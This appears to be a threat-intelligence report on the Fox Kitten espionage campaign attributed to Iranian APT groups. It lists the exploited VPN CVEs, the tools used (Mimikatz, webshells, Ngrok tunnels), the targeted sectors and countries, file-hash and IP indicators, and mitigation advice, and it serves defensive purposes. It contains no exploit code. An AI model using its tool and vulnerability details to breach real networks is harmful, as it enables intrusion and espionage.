Fox Kitten Campaign: Iranian APTs Target Global Infrastructure via VPN Exploits
- Actor Motivations: Espionage,Exfiltration
- Attack Vectors: Broken Authentication,Vulnerability Exploitation,Backdoor,Dropper,RAT,Spyware,Trojan
- Attack Complexity: Medium
- Threat Risk: High Impact/High Probability
Threat Overview
Iranian APT groups APT34 and APT33 jointly operated the Fox Kitten campaign from 2017 to 2019, exploiting VPN vulnerabilities (e.g., Pulse Secure CVE-2019-11510, Fortinet CVE-2018-13379) to breach networks across Israel, the US, Gulf states, and Europe. Targeted sectors included IT, telecommunications, oil and gas, aviation, government, and security. The attackers established persistence using custom and open-source tools, including SSH tunnels, RDP proxies, webshells, and credential dumping via Mimikatz and ProcDump. Tools like Ngrok and Serveo enabled data exfiltration. The infrastructure supported both espionage and potential destructive operations tied to malware such as ZeroCleare and Dustman.
Detected Targets
| Type | Description | Confidence |
|---|---|---|
| Sector | Defense | Verified |
| Sector | Government Agencies and Services | Verified |
| Sector | Information Technology | Verified |
| Sector | Aerospace | Verified |
| Sector | Oil and Gas | Verified |
| Sector | Telecommunication | Verified |
| Sector | Utilities | Verified |
| Region | Australia | Verified |
| Region | Austria | Verified |
| Region | Finland | Verified |
| Region | France | Verified |
| Region | Germany | Verified |
| Region | Hungary | Verified |
| Region | Israel | Verified |
| Region | Italy | Verified |
| Region | Kuwait | Verified |
| Region | Lebanon | Verified |
| Region | Poland | Verified |
| Region | Saudi Arabia | Verified |
| Region | United Arab Emirates | Verified |
| Region | United States | Verified |
Exploited Vulnerabilities
Extracted IOCs
- 01a9293fb10985204a4278006796ea3f
- 0c4db17ed145310f336ab4887914f80c
- 0f7d3d33d7235b13d0fac4329e0d2420
- 29fb089328e78f67ff86739583a9e63a
- 31b431df84eaf71848c8b172c40124ec
- 364f57928fc5fb0019b73f3fbd57f99b
- 41cda77c69614a0fbfcc4a38ebae659b
- 475f89de6031db2158231eafa07b8b72
- 54af54c9e0aa4b26c4be803c44c5f473
- 5c67064f8fd83fdcceab49728495c3f4
- 5c9d14c8eef4e9b8c0b4bd0d28c5a77a
- 5def1ab33ddf4455aaf8b7b70ad69e04
- 62de35201acc8833e04221d9343e73e0
- 6fea7a30b2bd6014c1b15defe8963273
- 783dc28185837c8e66dca34e9a519c7c
- 836d61745e087e6017832233701218a4
- 95ee534f32f305a895a1842898a4880e
- 9dc9bbd0c6b0a946489ccd8793d22f28
- a87d59456f323bd373cb958273dfe8bb
- ac9993f1124d404a08531df9a0ae28c9
- b4fcb52673089caf3e6e76379f2604d8
- b63de834ab7cc8fcd0e71003c6786213
- cb84fc4682a74ba81ef477bc1359959b
- f064ff619ebf67a59566c0dd54c5d05c
- 3741f987c9bd14263ffb4824dce8c14762de35201acc8833e04221d9343e73e0
- 7819bf37930edcdbb74b0535bc12558c06d882d4c601a086f3b0f13d5f756830
- a84549691a492ad081bf177b6c4518b0808502752ca0492aca995e9b620d507b
- cfcbb6472cac07ea138379578d80845b155837e476b50c93b6522b310a684a33
- 94a47463e0b8d52aec5e90a5177e0a9b54603feea3c4f3585011a5940c2f6b6f3587cabf61366a7b5f0ba0d63d009b36f9103618c1b86e073b89ce28ba2679cc
- 18[.]221.150.202
- 185[.]32.178.176
- 93[.]177.75.180
- 95[.]211.104.253
- 95[.]211.210.55
- 95[.]211.213.168
- 95[.]211.213.177
Tip: 36 related IOCs (7 IP, 0 domain, 0 URL, 0 email, 29 file hash) to this threat have been found.
FAQs
Understanding the Fox Kitten Cyber-Espionage Campaign
A long-running Iranian cyber-espionage operation called “Fox Kitten” infiltrated networks of dozens of organizations worldwide by exploiting VPN vulnerabilities and deploying custom malware and remote access tools.
The campaign is linked to Iranian state-sponsored groups, primarily APT34 (OilRig), with possible collaboration from APT33 (Elfin) and APT39 (Chafer).
The main objectives were long-term access, espionage, data theft, and possibly the future deployment of destructive malware like ZeroCleare or Dustman.
Targets included companies and institutions in Israel, the U.S., Gulf countries, and across Europe and Australia, focusing on sectors like oil & gas, aviation, IT, and government.
They exploited known security flaws in VPN services to break into networks, then used tools like RDP tunnels, webshells, and stolen credentials to maintain access.
These sectors often possess sensitive data and intellectual property relevant to Iran’s geopolitical and strategic interests.
The attackers used a mix of self-developed tools (e.g., POWSSHNET, STSRCheck), open-source tools (JuicyPotato, Invoke the Hash), and legitimate remote access tools like Ngrok and Putty.
It was highly targeted but geographically widespread, with persistent attacks focused on strategically valuable organizations.
Apply security patches promptly, monitor for unusual remote access activity, disable unused services, and deploy endpoint protections that can detect credential theft and tunneling activity.